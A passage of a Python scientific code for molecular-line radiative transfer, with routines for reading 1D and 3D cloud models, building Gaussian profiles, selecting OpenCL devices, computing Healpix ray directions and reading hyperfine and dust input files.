fromfile(fp, np.float32).reshape(nz*ny*nx,7)\n except:\n # perhaps cloud is in octree format but just with one hierarchy level ...\n fp.close()\n print(\"Trying to read plain cartesian cloud from octree file....\")\n fp = open(INI['cloud'], 'rb')\n nx, ny, nz, otl, cells = fromfile(fp, np.int32, 5)\n if (otl!=1):\n print(\"Trying to read cartesian grid cloud but file has %d levels of hierarchy!\" % otl)\n sys.exit(0)\n C = transpose(fromfile(fp, np.float32).reshape(7, 1+cells)[:, 1:].reshape(7, cells)) \n ###\n C[:,0] = clip(C[:,0]*INI['kdensity'], 1.0e-4, 1e15) # density\n C[:,1] = clip(C[:,1]*INI['ktemperature'], 2.0, 2900.0) # Tkin\n C[:,2] = clip(C[:,2]*INI['ksigma'], 1e-10, 1e3) # sigma, nonthermal\n if (INI['thermaldv']>0):\n C[:,2] = np.sqrt(C[:,2]**2.0 + 2.0e-10*BOLTZMANN*C[:,1]/(AMU*MOL.WEIGHT)) # add thermal broadening\n C[:,3] *= INI['kvelocity']\n C[:,4] *= INI['kvelocity']\n C[:,5] *= INI['kvelocity']\n C[:,6] *= INI['kabundance']\n #\n INI['min_sigma'] = np.min(C[:,2])\n INI['max_sigma'] = np.max(C[:,2])\n #\n RHO = C[:,0] # density\n TKIN = C[:,1] # Tkin\n CLOUD = np.zeros(cells, cl.cltypes.float4)\n CLOUD[:]['x'] = C[:,3] # vx\n CLOUD[:]['y'] = C[:,4] # vy\n CLOUD[:]['z'] = C[:,5] # vz\n CLOUD[:]['w'] = C[:,2] # sigma\n ABU = C[:,6] # left as 1d vecto\n return RHO, TKIN, CLOUD, ABU, nx, ny, nz\n \n\n\ndef ReadCloud1D(INI, MOL):\n \"\"\"\n Read and rescale 1D cloud\n Input:\n INI = initialisation parameter dictionary\n MOL = Molecule\n Return:\n RADIUS, VOLUME, RHO, TKIN, CLOUD, ABU = cloud data, where\n CLOUD is [ Vrad, Rc, dummy, sigma ]\n Note:\n File has data in the order of: rho, Tkin, sigma, abu, vrad\n \"\"\"\n fp = open(INI['cloud'], 'rb')\n CELLS = fromfile(fp, np.int32, 1)[0]\n VOLUME = np.zeros(CELLS, np.float32)\n RADIUS = fromfile(fp, np.float32, CELLS)\n # 
cloud file may be normalised or it may be absolute values [cm]\n GL_IN_CLOUD_FILE = RADIUS[CELLS-1] ;\n for i in range(CELLS): RADIUS[i] /= GL_IN_CLOUD_FILE # RADIUS is normalised !!\n VOLUME[0] = RADIUS[0]**3.0\n for i in range(1, CELLS): VOLUME[i] = RADIUS[i]**3.0 - RADIUS[i-1]**3.0\n RHO = np.zeros(CELLS, np.float32)\n TKIN = np.zeros(CELLS, np.float32)\n ABU = np.zeros(CELLS, np.float32)\n CLOUD = np.zeros(CELLS, cl.cltypes.float4)\n # CLOUD.x/y/z/w = Vrad, Rc, dummy, sigma\n molwei = MOL.WEIGHT\n for i in range(CELLS):\n buf = fromfile(fp, np.float32, 5) # rho, Tkin, sigma, abundance, Vrad\n RHO[i] = max(1.0e-5, buf[0] * INI['kdensity'])\n TKIN[i] = min(2900.0, buf[1] * INI['ktemperature'])\n ABU[i] = max(1.0e-20, buf[3] * INI['kabundance'])\n CLOUD[i]['z'] = ABU[i] # z=abundance\n CLOUD[i]['x'] = buf[4] * INI['kvelocity'] # x=Vrad\n sigma = buf[2] * INI['ksigma'] # multiplication applied to nonthermal component only\n if (INI['thermaldv']>0):\n sigma = np.sqrt(sigma*sigma + 2.0e-10*BOLTZMANN*TKIN[i] / (AMU*MOL.WEIGHT))\n CLOUD[i]['w'] = sigma # w = sigma\n if (not(isfinite(sigma))):\n print(\" ??? TKIN %10.3e, buf[2] %.3e, ksigma %.3e\\n\" % (TKIN[i], buf[2], INI['ksigma']))\n fp.close()\n RHO = clip(RHO, 1.0e-5, 1e20)\n TKIN = clip(TKIN, 2.0, 2900.0)\n ABU = clip(ABU, 1.0e-20, 2.0)\n #\n if (0):\n CLOUD[0]['y'] = 0.5*RADIUS[0] # y=Rc\n for icell in range(1, CELLS): # radius weighted by volume\n CLOUD[icell]['y'] = 0.5*(RADIUS[icell-1]+RADIUS[icell])\n if (1):\n # CLOUD[].y = effective shell radius\n CLOUD[0]['y'] = 0.5*RADIUS[0] # y=Rc\n for icell in range(1,CELLS): # radius weighted by volume\n CLOUD[icell]['y'] = np.sqrt( 0.5*RADIUS[icell-1]**2.0 + 0.5*RADIUS[icell]**2.0 )\n if (0):\n # check the effect of replacing Vrad with the average over inner and outer boundary values\n # ... 
effect minimal (in test case)\n        for icell in range(CELLS-1, -1, -1):\n            CLOUD[icell]['x'] = 0.5*(CLOUD[icell-1]['x']+CLOUD[icell]['x'])\n    print(\"================================================================\")\n    print(\"CELLS %d\" % CELLS)\n    print(\"DENSITY        %10.3e to %10.3e, average_vol %10.3e\" % (np.min(RHO), np.max(RHO), sum(VOLUME*RHO)/sum(VOLUME)))\n    print(\"TKIN           %10.3e to %10.3e, average_vol %10.3e\" % (np.min(TKIN), np.max(TKIN), sum(VOLUME*TKIN)/sum(VOLUME)))\n    print(\"THERMAL SIGMA  %10.3e to %10.3e\" % (sqrt(2.0e-10*BOLTZMANN*np.min(TKIN) / (AMU*molwei)),\n                                               sqrt(2.0e-10*BOLTZMANN*max(TKIN) / (AMU*molwei))))\n    sigma = CLOUD[:]['w']\n    print(\"TOTAL SIGMA    %10.3e to %10.3e, average_vol %10.3e\" % (np.min(sigma), np.max(sigma), sum(VOLUME*sigma)/sum(VOLUME)))\n    print(\"ABUNDANCE      %10.3e to %10.3e\" % (np.min(ABU), np.max(ABU)))\n    print(\"VRAD           %10.3e to %10.3e\" % (np.min(CLOUD[:]['x']), np.max(CLOUD[:]['x'])))\n    print(\"================================================================\")\n    \n    if (INI['angle']>0.0):   # cloud size defined by the ini file\n        INI['GL'] = INI['angle'] * ARCSEC_TO_RADIAN * INI['distance'] * PARSEC   # [cm] = 1D cloud radius\n        if (GL_IN_CLOUD_FILE>1.0001):   # but also cloud file had values in [cm]\n            if (fabs(INI['GL']-GL_IN_CLOUD_FILE)>(0.01*INI['GL'])):\n                print(\"**** WARNING: CLOUD FILE SPECIFIED RADIUS %.3e BUT INI FILE SCALED IT TO %.3e\\n\" % \n                      (GL_IN_CLOUD_FILE, INI['GL']))\n    else:\n        INI['GL'] = GL_IN_CLOUD_FILE\n        INI['angle'] = INI['GL'] / (ARCSEC_TO_RADIAN*INI['distance']*PARSEC)\n    #\n    if (0):\n        print(\"________________________________________________________________________________\")\n        print('RADIUS')\n        print(RADIUS)\n        print('VOLUME')\n        print(VOLUME) \n        print(\"TKIN\")\n        print(TKIN)\n        print(\"SIGMA\")\n        print(CLOUD[:,]['w'])\n        print(\"VRAD\")\n        print(CLOUD[:,]['x'])\n        print(\"ABU\")\n        print(CLOUD[:,]['z'])\n        print(\"________________________________________________________________________________\")\n        sys.exit()\n    return RADIUS, VOLUME, RHO, TKIN, CLOUD, ABU\n\n\n\ndef GaussianProfiles(s0, s1, ng, nchn, dv):\n    \"\"\"\n    Prepare array of ng Gaussian profiles between sigma = s0 and s1.\n    \"\"\"\n    # print(\"Gaussian profiles, nchn=%d\" % nchn) \n    a = clip(s0, 0.05, 1.0)\n    b = clip(s1, 0.05, 100.0)\n    a = 0.999*a\n    b = 1.001*b\n    SIGMA0 = a\n    SIGMAX = 10.0**( np.log10(b/a)/(ng-1.0) )\n    ## SIGMAX = 10.0**(np.log10(max([a, 1.01*b])/b) / (ng-1.0))\n    if (SIGMAX>1.06): print(\"*** WARNING: SIGMAX = %.4f > 1.06 !!!\" % SIGMAX)\n    print(\"GAUSS(%.3e, %.3e) : [%.3e, %.3e], SIGMA0 %.3e, SIGMAX %.3e\" % \n          (s0, s1, SIGMA0, SIGMA0*SIGMAX**(ng-1.0), SIGMA0, SIGMAX))\n    GAU = np.zeros((ng, nchn), np.float32)\n    v = (-0.5*(nchn-1.0)+arange(nchn))*dv\n    # integration limits, LIM = first and last nonzero channel\n    LIM = np.zeros(ng, cl.cltypes.int2)\n    for i in range(ng):\n        s = SIGMA0 * SIGMAX**i\n        GAU[i,:] = clip(np.exp(-v*v/(s*s)), 1.0e-30, 1.0)   # doppler width ??\n        GAU[i,:] /= sum(GAU[i,:])\n        m = nonzero(GAU[i,:]>2.0e-5)\n        if (1):\n            LIM[i]['x'] = m[0][ 0]\n            LIM[i]['y'] = m[0][-1]\n        else:\n            LIM[i]['x'] = 0\n            LIM[i]['y'] = nchn-1 \n    asarray(GAU, np.float32).tofile('gauss_py.dat')\n    return SIGMA0, SIGMAX, GAU, LIM\n \n \n
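# Illustrative call (values hypothetical): 32 log-spaced profiles between\n# sigma=0.1 and 2.0 km/s on a 256-channel grid with 0.05 km/s channels;\n# profile i then has sigma = SIGMA0*SIGMAX**i and LIM gives its nonzero channels:\n#   SIGMA0, SIGMAX, GAU, LIM = GaussianProfiles(0.1, 2.0, 32, 256, 0.05)\n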
\ndef InitCL(GPU=0, platforms=[], idevice=0, sub=0, verbose=True):\n    \"\"\"\n    Usage:\n        platform, device, context, queue, mf = InitCL(GPU=0, platforms=[], sub=0, idevice=0, verbose=True)\n    Input:\n        GPU       = if >0, try to return a GPU device instead of CPU\n        platforms = optional array of possible platform numbers\n        idevice   = index of the device within the selected platform (default idevice=0)\n        sub       = optional number of threads for a subdevice (first returned)\n        verbose   = if True, print out the names of the platforms\n    \"\"\"\n    platform, device, context, queue = None, None, None, None\n    possible_platforms = range(6)\n    if ((len(platforms)>0)&(platforms[0]>=0)):\n        possible_platforms = platforms\n    device = []\n    for iplatform in possible_platforms:\n        if (verbose): print(\"try platform %d, idevice=%d, request GPU=%d\" % (iplatform, idevice, GPU))\n        try:\n            platform = cl.get_platforms()[iplatform]\n            if (GPU>0):\n                device = [ platform.get_devices(cl.device_type.GPU)[idevice] ]\n            else:\n                device = [ platform.get_devices(cl.device_type.CPU)[idevice] ]\n            if (sub>0):\n                # try to make subdevices with sub threads, return the first one\n                dpp = cl.device_partition_property\n                device = [device[0].create_sub_devices( [dpp.EQUALLY, sub] )[0],]\n            context = cl.Context(device)\n            queue = cl.CommandQueue(context)\n            break\n        except:\n            pass\n    # print(\"***InitCL completed***\")\n    if (verbose):\n        print(\"    Platform: \", platform)\n        print(\"    Device:   \", device)\n    return platform, device, context, queue, cl.mem_flags\n \n\n\ndef InitCL_string(INI, verbose=True):\n    \"\"\"\n    Usage:\n        platform, device, context, queue, mf = InitCL(INI, verbose=True)\n    Input:\n        INI = structure built based on the initialisation file;\n              we use INI['sdevice'] string to identify the requested device\n              and only set INI['GPU'] to indicate whether that was a CPU or a GPU\n        verbose = if True, print out the names of the platforms\n    \"\"\"\n    platforms = cl.get_platforms()\n    if (1):   # print out platform.version, device.version for all devices\n        print(\"================================================================================\")\n        for iplatform in range(len(platforms)):\n            print(' Platform [%d]: %s' % (iplatform, platforms[iplatform].name))\n            devices = platforms[iplatform].get_devices(cl.device_type.CPU)\n            for idevice in range(len(devices)):\n                print('    CPU [%d]: %s' % (idevice, devices[idevice].name))\n            devices = platforms[iplatform].get_devices(cl.device_type.GPU)\n            for idevice in range(len(devices)):\n                print('    GPU [%d]: %s' % (idevice, devices[idevice].name))\n        print(\"================================================================================\")\n    ###\n    platform, device, context, queue = None, None, None, None\n    device = []\n    for iplatform in range(len(platforms)):\n        platform = cl.get_platforms()[iplatform]\n        devices = platform.get_devices(cl.device_type.GPU)\n        for idevice in range(len(devices)):\n            if (INI['sdevice'] in devices[idevice].name): \n                device = [ devices[idevice] ]\n                INI['GPU'] = 1\n                break\n        if (len(device)>0): break\n        devices = platform.get_devices(cl.device_type.CPU)\n        for idevice in range(len(devices)):\n            if (INI['sdevice'] in devices[idevice].name):\n                device = [ devices[idevice] ]\n                INI['GPU'] = 0\n                break\n        if (len(device)>0): break\n    if (len(device)<1):\n        print(\"InitCL_string: could not find any device matching string: %s\" % INI['sdevice'])\n        sys.exit()\n    print(INI['sdevice'])\n    # try to make subdevices with sub threads, return the first one\n    try:\n        context = cl.Context(device)\n        queue = cl.CommandQueue(context)\n    except:\n        print(\"Failed to create OpenCL context and queue for device: \", device[0])\n        sys.exit()\n    if (verbose):\n        print(\"Selected:\")\n        print(\"    Platform: \", platform)\n        print(\"    Device:   \", device)\n        print(\"================================================================================\") \n    return platform, device, context, queue, cl.mem_flags\n \n\n\ndef IRound(a, b):\n    if 
(a%b==0):\n return a\n return (a//b+1)*b\n\n\n\ndef Pixel2AnglesRing(nside, ipix):\n # Convert Healpix pixel index to angles (phi, theta), theta=0.5*pi-lat, phi=lon\n # Uses formulas for maps in RING order.\n # int nl2, nl4, npix, ncap, iring, iphi, ip, ipix1 ;\n # float fact1, fact2, fodd, hip, fihip ;\n npix = 12*nside*nside # total number of points\n theta, phi = -999.0, -999.0\n # if ((ipix<0)|(ipix>=npix)): return -999.0, -999.0\n ipix1 = ipix + 1 # in {1, npix}\n nl2 = 2*nside \n nl4 = 4*nside \n ncap = 2*nside*(nside-1) # points in each polar cap, =0 for nside =1\n fact1 = 1.5*nside \n fact2 = 3.0*nside*nside \n if (ipix1<=ncap): # North Polar cap\n hip = ipix1/2.0\n fihip = int(hip)\n iring = int(sqrt(hip-sqrt(fihip))) + 1 # counted from North pole\n iphi = ipix1 - 2*iring*(iring - 1) \n theta = arccos(1.0-iring*iring / fact2)\n phi = (iphi - 0.5) * pi/(2.0*iring)\n else:\n if (ipix1<=nl2*(5*nside+1)): # Equatorial region ------\n ip = ipix1 - ncap - 1\n iring = int(ip/nl4) + nside # counted from North pole\n iphi = (ip%nl4) + 1 \n fodd = 0.5 * (1 + (iring+nside)%2) # 1 if iring+nside is odd, 1/2 otherwise\n theta = arccos( (nl2 - iring) / fact1 )\n phi = (iphi - fodd) * pi /(2.0*nside)\n else: # South Polar cap\n ip = npix - ipix1 + 1\n hip = ip/2.0 \n fihip = int(hip) \n iring = int(sqrt( hip - sqrt(fihip) )) + 1 # counted from South pole\n iphi = 4*iring + 1 - (ip - 2*iring*(iring-1))\n theta = arccos( -1.0 + iring*iring / fact2 ) \n phi = (iphi - 0.5) * pi/(2.0*iring) \n return theta, phi\n\n\n\n\n\ndef GetHealpixDirection(nside, ioff, idir, X, Y, Z, offs=1, DOUBLE_POS=False, theta0=-99.0, phi0=-99.0, with_healpy=False):\n \"\"\"\n Return ray direction and position based on Healpix angular discretisation.\n Input:\n nside = resolution parameter of the Healpix map\n ioff = index for the offset of the initial position\n idir = index of the Healpix pixel (=direction)\n X, Y, Z = root dimensions of the model\n offs = number of positions per dimension per cell\n Default is offs=1, one ray per surface element, ioff=0-3 cover all rays\n For offs=2, 2x2 rays per cell, ioff=0-15 covers all the ray start positions over 2x2 cell.\n Kernel steps the whole surface at steps of 2 cells, starting from the offsets provided here.\n offs=1 => ioff=0:4, offs=2 => ioff=0:16\n \"\"\"\n if (DOUBLE_POS):\n POS = cl.cltypes.make_double3()\n ## DIR = cl.cltypes.make_double3()\n else:\n POS = cl.cltypes.make_float3()\n DIR = cl.cltypes.make_float3()\n \n \n if (nside==0): # mostly for debugging -- only the six cardinal directions\n a = ioff // 4 # offsets within a cell\n b = ioff % 4 # offsetss between 2x2 cells\n d1 = (0.01171875+(a//offs)) / offs + (b//2)\n d2 = (0.91015625+(a% offs)) / offs + (b% 2)\n d1 = (0.531+(a//offs)) / offs + (b//2)\n d2 = (0.53+(a% offs)) / offs + (b% 2)\n b = 1.0e-5\n # WHY IS TEX DEPENDENT ON THIS ANGLE ????????????????????????????????\n # b=0.3 gives expected Tex when collisions are weak... 
= 1.086 \n        b = 0.3 \n        b = 1.0e-4\n        a = sqrt(1.0-b*b-b*b)\n        if (idir in [0,1]):\n            DIR['x'], DIR['y'], DIR['z'] = a*[1.0,-1.0][idir % 2], b, b\n            POS['x'], POS['y'], POS['z'] = 0.0, d1, d2\n        elif (idir in [2,3]):\n            DIR['y'], DIR['x'], DIR['z'] = a*[1.0,-1.0][idir % 2], b, b\n            POS['y'], POS['x'], POS['z'] = 0.0, d1, d2\n        else:\n            DIR['z'], DIR['x'], DIR['y'] = a*[1.0,-1.0][idir % 2], b, b\n            POS['z'], POS['x'], POS['y'] = 0.0, d1, d2\n        return POS, DIR, idir\n    \n    if (with_healpy==False):\n        theta, phi = Pixel2AnglesRing(nside, idir)\n    else:\n        theta, phi = healpy.pix2ang(nside, idir)   # theta from the pole\n    if ((theta0>-2.0*pi)&(phi0>-4.0*pi)):\n        theta, phi = theta0, phi0\n    else:\n        phi += 0.137534213   # to avoid exact (+-0.666667,+-0.6666667, 0.3333333) directions\n        # theta = 0.00005+theta*0.99995\n        pass\n\n    DIR['x'] = sin(theta)*cos(phi)\n    DIR['y'] = sin(theta)*sin(phi)\n    DIR['z'] = cos(theta)\n    if (1):\n        if (abs(DIR['x'])<1.0e-4): DIR['x'] = 1.0e-4 \n        if (abs(DIR['y'])<1.0e-4): DIR['y'] = 1.0e-4 \n        if (abs(DIR['z'])<1.0e-4): DIR['z'] = 1.0e-4 \n        tmp = 1.0/sqrt(DIR['x']*DIR['x']+DIR['y']*DIR['y']+DIR['z']*DIR['z']) \n        DIR['x'] = tmp*DIR['x']\n        DIR['y'] = tmp*DIR['y']\n        DIR['z'] = tmp*DIR['z']\n    # Which is the LEADING edge\n    if (1):\n        tmp = asarray([DIR['x'], DIR['y'], DIR['z']], float64)\n        imax = argmax(abs(tmp))\n        tmp[imax] *= 1.00001\n        tmp /= sqrt(sum(tmp**2.0))\n        DIR['x'], DIR['y'], DIR['z'] = tmp\n        LEADING = 2*imax + [0,1][tmp[imax]<0.0]\n    else:\n        if (abs(DIR['x'])>abs(DIR['y'])):\n            if (abs(DIR['x'])>abs(DIR['z'])):\n                if (DIR['x']>0.0): LEADING = 0   # lower X\n                else:              LEADING = 1   # upper X\n            else:\n                if (DIR['z']>0.0): LEADING = 4   # lower Z\n                else:              LEADING = 5   # upper Z\n        else:   # Y or Z\n            if (abs(DIR['y'])>abs(DIR['z'])):\n                if (DIR['y']>0.0): LEADING = 2   # lower Y\n                else:              LEADING = 3   # upper Y\n            else:\n                if (DIR['z']>0.0): LEADING = 4   # lower Z\n                else:              LEADING = 5   # upper Z\n    if (0):   # one ray per cell, rays at steps of two cells, ioff=0-3\n        d1 = 0.5 + int(ioff/2)\n        d2 = 0.5 + int(ioff%2)\n        # print(d1, d2)\n    else:\n        # index a for offs*offs position inside a cell, index b to cover 2x2 cells\n        # (each call to simulation kernel will do rays at steps of two cells)\n        a = ioff // 4    # index for offsets inside a cell\n        b = ioff %  4    # index for offsets among 2x2 cells, ioff = [0, 4*offs*offs[\n
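        # DIR is now fixed and LEADING encodes the upstream face as 2*axis\n        # plus 0 for the lower and 1 for the upper face (axis with max |DIR|);\n        # the offsets below place the ray start position on that leading face.\n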
        # .... inside cell ....     ... 2x2 cells ...\n        # For some reason PL is sensitive to offsets ??\n        # set offsets to 0.49 and 0.49 and PL has up to 10% variations\n        # this worked for 25^3 test up to MAXL=4\n        d1 = (0.403714567+(a//offs)) / offs + (b//2)\n        d2 = (0.513975432+(a% offs)) / offs + (b% 2)\n        d1 = (0.01171875+(a//offs)) / offs + (b//2)\n        d2 = (0.91015625+(a% offs)) / offs + (b% 2)\n    \n    if (LEADING in [0,1]):   # lower or upper X-axis face\n        POS['x'], POS['y'], POS['z'] = 0, d1, d2 \n    elif (LEADING in [2,3]): \n        POS['y'], POS['x'], POS['z'] = 0, d1, d2\n    else: \n        POS['z'], POS['y'], POS['x'] = 0, d1, d2\n    ###\n    return POS, DIR, LEADING\n \n \n \ndef GetSteps1D(CELLS, RADIUS, NRAY, IP, DIRWEI):\n    \"\"\"\n    For strictly 1D models:\n    precalculate for each ray the distance it travels in each of the shells = STEP,\n    and calculate the average length within each cell (for emission weighting) = APL.\n    Input:\n        CELLS  = number of cells\n        RADIUS = shell radii [0,1]\n        NRAY   = number of rays\n        IP     = impact parameters of the rays [0,1]\n        DIRWEI = weight of each ray [NRAY];\n                 called with DIRWEI=[] before writing of spectra, when STEP is updated\n                 but DIRWEI and APL are not used\n    Return:\n        STEP = length of each ray within each of the cells [NRAY, CELLS]\n        APL  = total length of ray paths within each cell [CELLS]\n    \"\"\"\n    STEP = np.zeros((NRAY, CELLS), np.float32)\n    APL = np.zeros(CELLS, np.float32)\n    # innermost cell\n    print(\"Innermost cell R=%.6f, Innermost ray %.6f\" % (RADIUS[0], IP[0]))\n    for iray in range(NRAY):\n        if (IP[iray]<RADIUS[0]):   # ray passes through the innermost cell\n            tmp = 2.0*sqrt((RADIUS[0]**2.0)-(IP[iray]**2.0)) + 1.0e-6\n            STEP[iray, 0] = tmp\n            if (len(DIRWEI)>0): APL[0] += tmp*DIRWEI[iray]\n        else:\n            STEP[iray, 0] = -1.0\n    # the rest of the cells\n    for icell in range(1, CELLS):\n        for iray in range(NRAY):\n            if (IP[iray]>RADIUS[icell]):   # shell is not hit at all\n                STEP[iray, icell] = -1.0 \n            else:\n                if (IP[iray]>RADIUS[icell-1]):   # almost tangential\n                    tmp = 2.0*sqrt((RADIUS[icell]**2.0)-(IP[iray]**2.0)) + 1.0e-6 \n                    STEP[iray, icell] = tmp \n                    if (len(DIRWEI)>0): APL[icell] += tmp*DIRWEI[iray] \n                else:   # two steps, incoming and outcoming ray are both:\n                    tmp = sqrt((RADIUS[icell  ]**2.0)-(IP[iray]**2.0)) - \\\n                          sqrt((RADIUS[icell-1]**2.0)-(IP[iray]**2.0)) + 1.0e-6 \n                    STEP[iray, icell] = tmp \n                    if (len(DIRWEI)>0): APL[icell] += 2.0*tmp*DIRWEI[iray] \n    if (STEP[0, 0]<1e-10):\n        print(\" *** INNERMOST CELL IS NOT HIT BY ANY RAYS -> increase nray and/or adjust alpha (STEP[0,0]=%.5e)!!!\" % STEP[0,0])\n        print(\"IP = \")\n        print(IP)\n        sys.exit(0)\n    if (len(DIRWEI)<1): return STEP   # this one when called before writing the spectra\n    return STEP, APL                  # this one before simulations (DIRWEI used, APL updated)\n    \n \n\nclass BandO:\n    # Bands of LTE hfs\n    N = 0            # number of components\n    WIDTH = 0.0      # velocity channel\n    BANDWIDTH = 0.0  # bandwidth without distance between components\n    VMIN = 0.0\n    VMAX = 0.0\n    VELOCITY = asarray([], float32)   # line offsets in km/s for each component\n    WEIGHT = asarray([], float32)     # relative weights\n    \n    def Init(self, bandwidth, width):\n        self.N = 0 \n        self.BANDWIDTH = bandwidth \n        self.WIDTH = width \n        self.VMIN = 0.0 \n        self.VMAX = 0.0 \n\n    def Add(self, velocity, weight):   # add another line component to the band\n        self.VELOCITY = concatenate((self.VELOCITY, [velocity,]))\n        self.WEIGHT = concatenate((self.WEIGHT, [weight,]))\n        self.N += 1\n        self.VMAX = np.max(self.VELOCITY)\n        self.VMIN = np.min(self.VELOCITY)\n    \n    def Channels(self):\n        # return the number of channels needed for this band\n        return (int)((self.BANDWIDTH+self.VMAX-self.VMIN)/self.WIDTH) ;\n\n
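# Illustrative use of BandO (values hypothetical): a two-component band with\n# 10 km/s bandwidth and 0.1 km/s channels:\n#   band = BandO(); band.Init(10.0, 0.1)\n#   band.Add(-1.0, 0.4); band.Add(+1.0, 0.6)\n#   band.Channels()   # = (10.0+1.0-(-1.0))/0.1 = 120 channels\n\n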
 \nclass OLBandO:\n    BANDS = 0    # number of frequency bands (with possibly multiple components)\n    NCMP = []    # number of components in each band\n    TRAN = []    # list of transitions in each band\n    FMIN = []    # minimum transition frequency in the band\n    FMAX = []    # maximum transition frequency in the band\n    DV = 0.0     # channel width\n\n    def Init(self, dv):\n        self.BANDS = 0\n        self.DV = dv\n    \n    def Bands(self):\n        return self.BANDS\n    \n    def Components(self, iband):\n        return self.NCMP[iband] \n    \n    def AddBand(self, components):\n        self.TRAN.append( zeros(components, int32) )\n        self.NCMP.append( 0 )\n        self.FMIN.append( 1.0e30 )\n        self.FMAX.append( 0.0 )\n        self.BANDS += 1\n    \n    def AddTransition(self, tran, freq):\n        iband = self.BANDS-1\n        self.TRAN[iband][self.NCMP[iband]] = tran\n        self.NCMP[iband] += 1\n        if (freq<self.FMIN[iband]): self.FMIN[iband] = freq\n        if (freq>self.FMAX[iband]): self.FMAX[iband] = freq \n    \n    def GetTransition(self, iband, icmp):\n        return self.TRAN[iband][icmp]\n    \n    def Channels(self, iband):\n        # Return NCHN = the number of extra channels needed\n        return 0\n\n\n \ndef ReadHFS(INI, MOL):\n    \"\"\"\n    Read description of the HFS structure, for calculations assuming LTE between HFS components.\n    Input:\n        filename = name of the HFS structure description\n    Return:\n        BAND     = structure containing the band information\n        channels = maximum number of channels needed for any of the transitions \n    \"\"\"\n    BAND = []   # BandO for each transition\n    width = INI['bandwidth'] / INI['channels']   # this remains unchanged\n    for tran in range(MOL.TRANSITIONS):\n        BAND.append(BandO())\n        BAND[tran].Init(INI['bandwidth'], width)\n    # First set up transitions mentioned in the hfs file\n    # (assumed layout: one line \"upper lower ncmp\" per transition, followed by\n    # ncmp lines of \"velocity weight\")\n    lines = open(INI['hfsfile']).readlines()\n    iline = 0\n    MAXCHN, MAXCMP = 0, 1\n    while (iline<len(lines)):\n        s = lines[iline].split()\n        iline += 1\n        if (len(s)<3): continue\n        upper, lower, ncmp = int(s[0]), int(s[1]), int(s[2])\n        tran = MOL.L2T(upper-1, lower-1)\n        for i in range(ncmp):\n            s = lines[iline].split()\n            iline += 1\n            if (tran>=0): BAND[tran].Add(float(s[0]), float(s[1]))\n    for tran in range(MOL.TRANSITIONS):\n        upper, lower = MOL.T2L(tran)\n        MAXCHN = max([MAXCHN, BAND[tran].Channels()])\n        print(\"HFS %2d: %3d -> %3d = %d components\" % (tran, upper, lower, BAND[tran].N))\n        if (BAND[tran].N>1):\n            for i in range(BAND[tran].N):\n                print(\"     off %7.3f  weight %7.3f\" % (BAND[tran].VELOCITY[i], BAND[tran].WEIGHT[i]))\n        MAXCMP = max([MAXCMP, BAND[tran].N])\n    bandwidth = MAXCHN*width   # BAND.WIDTH == width == INI['bandwidth'] / INI['channels']\n    return BAND, MAXCHN, MAXCMP\n \n \n 
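# Illustrative call (keyword names as in ReadIni): requires INI['bandwidth'],\n# INI['channels'], and INI['hfsfile'] to be set; MAXCHN then sizes the spectra\n# and MAXCMP the per-band component arrays:\n#   BAND, MAXCHN, MAXCMP = ReadHFS(INI, MOL)\n\n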
def ReadDustTau(filename, gl, cells, transitions):\n    \"\"\"\n    Read dust optical depths from file => tau[cells, transitions].\n    File contains optical depths [1/pc], values are here converted to [1/GL].\n    Input:\n        filename    = name of the optical depth file saved from CRT\n        gl          = GL for the current model [cm]\n        cells       = number of cells in the model \n        transitions = number of transitions in the calculation\n    \"\"\"\n    fp = open(filename, 'rb')\n    a, b = fromfile(fp, int32, 2)\n    if ((a!=cells)|(b!=transitions)):\n        print(\"*** Error in ReadDustTau: (CELLS,TRANSITIONS)=(%d,%d), file has (%d,%d)\" % (cells,transitions,a,b))\n        sys.exit()\n    tau = fromfile(fp, float32).reshape(cells, transitions)\n    fp.close()\n    tau[:,:] *= gl/PARSEC   # optical depth per GL\n    if (1):\n        tau = clip(tau, 1.0e-30, 1.0e30)   # to avoid division-by-zero errors in the update kernel\n    return asarray(tau, float32)\n\n\n\ndef ReadDustEmission(filename, cells, transitions, width, mol):\n    \"\"\"\n    Read dust emission from file => emit[cells, transitions].\n    File contains values = photons / s / Hz / H2;\n    returned values = photons / s / channel / H2.\n    Input:\n        filename    = name of the dust emission file written by CRT\n        cells       = number of cells in the model\n        transitions = number of transitions \n        width       = channel width [km/s]\n        mol         = molecule object\n    Return:\n        dust emission [cells, transitions] in units photons / s / channel / H2\n    Note:\n        the caller will do scaling with density so that the final array should be in \n        units photons / s / channel / cm3\n    \"\"\"\n    fp = open(filename, 'rb')\n    a, b = fromfile(fp, int32, 2)\n    if ((a!=cells)|(b!=transitions)):\n        print(\"*** Error in ReadDustEmission: (CELLS,TRANSITIONS)=(%d,%d), file has (%d,%d)\" % (cells,transitions,a,b))\n        sys.exit()\n    emi = fromfile(fp, float32).reshape(cells, transitions)\n    fp.close()\n    for t in range(transitions):\n        emi[:,t] *= mol.F[t] * (1.0e5*width/C_LIGHT)   # converted to photons / s / channel / H2\n    return asarray(emi, float32)\n \n\n\ndef ReadOverlap(filename, mol, width, transitions, channels):\n    \"\"\"\n    Read file describing overlapping transitions:\n        # components\n        { upper lower }\n    \"\"\"\n    lines = open(filename, 'r').readlines()\n    OLBAND = OLBandO()\n    OLBAND.Init(width)\n    iline = 0\n    # (assumed layout: one line with the number of components, followed by\n    # that many \"upper lower\" lines)\n    while(iline<len(lines)):\n        s = lines[iline].split()\n        iline += 1\n        if (len(s)<1): continue\n        ncmp = int(s[0])\n        OLBAND.AddBand(ncmp)\n        for i in range(ncmp):\n            s = lines[iline].split()\n            iline += 1\n            u, l = int(s[0]), int(s[1])\n            t = mol.L2T(u-1, l-1)\n            OLBAND.AddTransition(t, mol.F[t])\n    return OLBAND\n\n\n\ndef ConvolveSpectra1D(filename, fwhm_as, angle_as=-1.0, GPU=0, platforms=[0,1,2,3,4], samples=201):\n    \"\"\"\n    Convolve spectra of a 1D model with a Gaussian beam.\n    Input:\n        filename  = name of the spectrum file\n        fwhm_as   = beam FWHM [arcsec]\n        GPU       = if >0, use GPU instead of CPU\n        platforms = potential OpenCL platforms to use, default [0,1,2,3,4]\n        angle_as  = model cloud radius in arcsec; if the parameter is not specified\n                    or the value is negative, try to read pickled INI information from \n                    the provided spectrum file and read the angle from there\n        samples   = optional, number of samples per one dimension (default 201)\n    \"\"\"\n    fp = open(filename, 'rb')\n    NSPE, NCHN = fromfile(fp, int32, 2)\n    V0, DV = fromfile(fp, float32, 2)\n    SPE = fromfile(fp, float32, NSPE*NCHN).reshape(NSPE, NCHN)\n    INI = None\n    if (angle_as<0.0):   # angle not given as parameter, read pickled data from the spectrum 